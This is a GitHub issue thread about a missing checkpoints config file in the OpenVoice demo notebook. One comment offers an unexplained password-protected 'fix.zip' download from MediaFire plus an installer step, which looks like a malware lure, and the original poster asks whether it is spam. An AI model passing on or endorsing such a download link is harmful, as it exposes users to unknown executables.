### ISSUE TITLE
I can't find checkpoints folder

### ISSUE THREAD

**Issue by dhvms99** [myshell-ai/OpenVoice#297]
While running a code in 'demo_part1.ipynb' file, I got an error like below

FileNotFoundError: [Errno 2] No such file or directory: 'checkpoints/base_speakers/EN/config.json'

`OpenVoice V2
Download the checkpoint from [here](https://myshell-public-repo-host.s3.amazonaws.com/openvoice/checkpoints_v2_0417.zip) and extract it to the checkpoints_v2 folder.`

Is it correct to unzip it inside the Openvoice folder?
I don't see any json files inside the checkpoint_v2 folder.

![image](https://github.com/user-attachments/assets/00e6096e-2624-4d09-88cd-8bcc73a8bf89)
![image](https://github.com/user-attachments/assets/a516ad7c-5c82-4573-a58a-057c58590a98)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dhvms99** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Is this spam?
